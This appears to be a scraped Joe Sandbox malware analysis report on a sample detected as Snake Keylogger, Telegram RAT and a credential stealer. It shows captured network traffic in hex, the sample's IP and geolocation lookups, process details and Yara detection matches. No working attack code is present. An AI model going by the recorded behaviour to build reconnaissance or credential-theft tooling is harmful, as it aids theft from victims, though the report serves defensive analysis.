Apr 12, 2022 21:49:22.070350885 CEST	1091	IN	Data Raw: 74 61 72 61 70 65 53 70 75 6f 72 47 74 6e 65 63 72 65 70 15 72 6f 74 61 72 61 70 65 53 6c 61 6d 69 63 65 44 74 6e 65 63 72 65 70 17 6c 6f 62 6d 79 53 79 74 69 6e 69 66 6e 49 65 76 69 74 61 67 65 6e 16 6c 6f 62 6d 79 53 79 74 69 6e 69 66 6e 49 65 Data Ascii: tarapeSpuorGtnecreprotarapeSlamiceDtnecreplobmySytinifnIevitagenlobmySytinifnIevitisoplobmySnanlobmySycnerruCisnalobmySycnerrucrotarapeSlamiceDycnerrucrotarapeSpuorGycnerrucrotarapeSpuorGrebmunrotarapeSlamiceDrebmunngiSevitagenngiS
Apr 12, 2022 21:49:22.070389032 CEST	1092	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Apr 12, 2022 21:49:22.070419073 CEST	1093	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Apr 12, 2022 21:49:22.070446014 CEST	1095	IN	Data Raw: 63 00 6f 00 4c 00 2e 00 73 00 69 00 68 00 74 00 24 18 00 00 00 04 00 6e 00 6f 00 63 00 49 00 2e 00 73 00 69 00 68 00 74 00 24 14 00 00 00 02 00 6e 00 6f 00 63 00 49 00 65 00 67 00 72 00 61 00 4c 00 79 00 61 00 72 00 54 00 2e 00 73 00 69 00 68 00 Data Ascii: coL.siht$nocI.siht$nocIegraLyarT.siht$&dirGoTpanS.siht$ =fA iP%9tB3}QS2:+QCjBca3a05d11f7f5f30b=nekoTyeKcil
Apr 12, 2022 21:49:22.070472956 CEST	1096	IN	Data Raw: 53 65 df 4b d8 db b7 ee 4b 59 13 b9 fb a2 0e 37 51 06 63 8f 1c 14 09 bd 15 1e fe 04 69 1c cd eb 85 fc c7 b2 df a5 fc 3c 8e df cd 88 54 6e 6f 49 d9 4f b0 a0 88 28 13 ce 68 a9 72 36 02 e7 01 41 ab d9 2f 5d 87 3b bd a9 41 48 54 c4 b1 98 7b db 31 20 Data Ascii: SeKKY7Qci<TnoIO(hr6A/];AHT{1 0-wZvf^?g%@%SyHE%YsSanix>j&V9]/J6EGhDR\|j(tiB+n#cAl5VA$i]CN2$V
Apr 12, 2022 21:49:22.070503950 CEST	1097	IN	Data Raw: c7 6f 09 69 cf a8 66 e3 36 56 a9 6d bc 09 69 cf dc 85 c7 19 ef 59 ab f2 d2 5f 36 94 46 61 74 b5 32 09 69 cf c1 d9 58 8e ea e0 2f 97 06 d0 22 f1 8b fc f3 6c bb 64 41 f6 e5 b7 78 4f ed 1c 57 a8 c4 1c 1a 98 46 c9 72 40 41 6f 40 8c 06 09 69 cf 3d f5 Data Ascii: oif6VmiY_6Fat2iX/"ldAxOWFr@Ao@i=mZW=\|iCJ<i4+FTyw<i*m/SD3/iY<1[SiiFM=[_+ix~o>'3giiUZci[s&~Y\8rAp"/i2&<PMC
Apr 12, 2022 21:49:22.070529938 CEST	1099	IN	Data Raw: 6a df 5a fd c7 1f 2a 67 05 69 b7 9f ba f9 24 39 2b 2a ba 11 e6 af d0 c0 98 40 05 22 5e b8 87 6d 41 7e 2c 49 90 7c 78 f4 6c 21 99 77 2c b5 d6 53 b4 06 a4 b8 22 83 c4 de 6b 5f ef ec ed 36 29 7d 84 b1 6d 2e 24 29 66 3c 0c d3 27 8f a6 15 d9 d2 35 28 Data Ascii: jZgi$9+@"^mA~,I\|xl!w,S"k_6)}m.$)f<'5(B>3zr3n-2H(_V;k/tt5"Mrl'ES^V<u*,]TWs#\|V6x[}>Jl_5ppKn1tV-}=J

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.7	49786	158.101.44.242	80	C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe

Timestamp	kBytes transferred	Direction	Data
Apr 12, 2022 21:49:38.970226049 CEST	2522	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Apr 12, 2022 21:49:39.129817009 CEST	2522	IN	HTTP/1.1 200 OK Date: Tue, 12 Apr 2022 19:49:39 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 34 2e 31 37 2e 35 32 2e 31 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 84.17.52.15</body></html>
Apr 12, 2022 21:49:39.286418915 CEST	2522	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Apr 12, 2022 21:49:39.444513083 CEST	2523	IN	HTTP/1.1 200 OK Date: Tue, 12 Apr 2022 19:49:39 GMT Content-Type: text/html Content-Length: 103 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 34 2e 31 37 2e 35 32 2e 31 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 84.17.52.15</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.7	49787	188.114.97.7	443	C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe

Timestamp	kBytes transferred	Direction	Data
2022-04-12 19:49:46 UTC	0	OUT	GET /xml/84.17.52.15 HTTP/1.1 Host: freegeoip.app Connection: Keep-Alive
2022-04-12 19:49:46 UTC	0	IN	HTTP/1.1 200 OK Date: Tue, 12 Apr 2022 19:49:46 GMT Content-Type: application/xml Content-Length: 347 Connection: close RateLimit-Reset: 614 X-RateLimit-Limit-Hour: 1200 X-RateLimit-Remaining-Hour: 1199 RateLimit-Limit: 1200 RateLimit-Remaining: 1199 Vary: Origin vary: Origin X-Database-Date: Tue, 22 Mar 2022 15:29:43 GMT Access-Control-Allow-Origin: * X-Kong-Upstream-Latency: 0 X-Kong-Proxy-Latency: 0 Via: kong/2.5.1 CF-Cache-Status: DYNAMIC Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct" Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Ch27lKZeYZjmPHBZTTy7CGTq45t5zW2h52QcXsZ%2BRfLwwbZuBVbPWsVuXy8X29dxIYYy9C3ixy%2FS%2FJOHvgBo1PU1YHP9Ybim3jeCHlHOAUiydtMjMeqwEoyGUBLiAKsr"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 6fae7cb38aca8fdd-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
2022-04-12 19:49:46 UTC	1	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 34 2e 31 37 2e 35 32 2e 31 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 43 48 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 53 77 69 74 7a 65 72 6c 61 6e 64 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 5a 48 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 5a 75 72 69 63 68 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 5a 75 72 69 63 68 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 38 30 34 32 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 45 75 72 6f 70 65 2f 5a 75 72 69 63 68 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 Data Ascii: <Response><IP>84.17.52.15</IP><CountryCode>CH</CountryCode><CountryName>Switzerland</CountryName><RegionCode>ZH</RegionCode><RegionName>Zurich</RegionName><City>Zurich</City><ZipCode>8042</ZipCode><TimeZone>Europe/Zurich</TimeZone><Latit

Target ID:	1
Start time:	21:48:46
Start date:	12/04/2022
Path:	C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe"
Imagebase:	0xd70000
File size:	34304 bytes
MD5 hash:	30BED8890C39E983E2A6B4F4E04EDD0B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000001.00000002.435325565.0000000004112000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.435325565.0000000004112000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.435325565.0000000004112000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000001.00000002.435325565.0000000004112000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000001.00000002.435253070.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000001.00000002.435253070.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.435253070.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000001.00000002.435253070.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low

Show Windows behavior

Target ID:	7
Start time:	21:49:27
Start date:	12/04/2022
Path:	C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe
Imagebase:	0xef0000
File size:	34304 bytes
MD5 hash:	30BED8890C39E983E2A6B4F4E04EDD0B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000000.431560806.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000000.431560806.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000000.431560806.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000007.00000000.431560806.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000000.429118422.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000000.429118422.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000000.429118422.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000007.00000000.429118422.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.605721974.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000002.605721974.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.605721974.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000007.00000002.605721974.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000000.430843529.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000000.430843529.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000000.430843529.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000007.00000000.430843529.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000000.430135696.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000007.00000000.430135696.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000000.430135696.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_SnakeKeylogger, Description: Detects Snake Keylogger, Source: 00000007.00000000.430135696.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.24445

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.exe.log

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

Windows Analysis Report
SecuriteInfo.com.W32.MSIL_Kryptik.GXA.genEldorado.18172.24445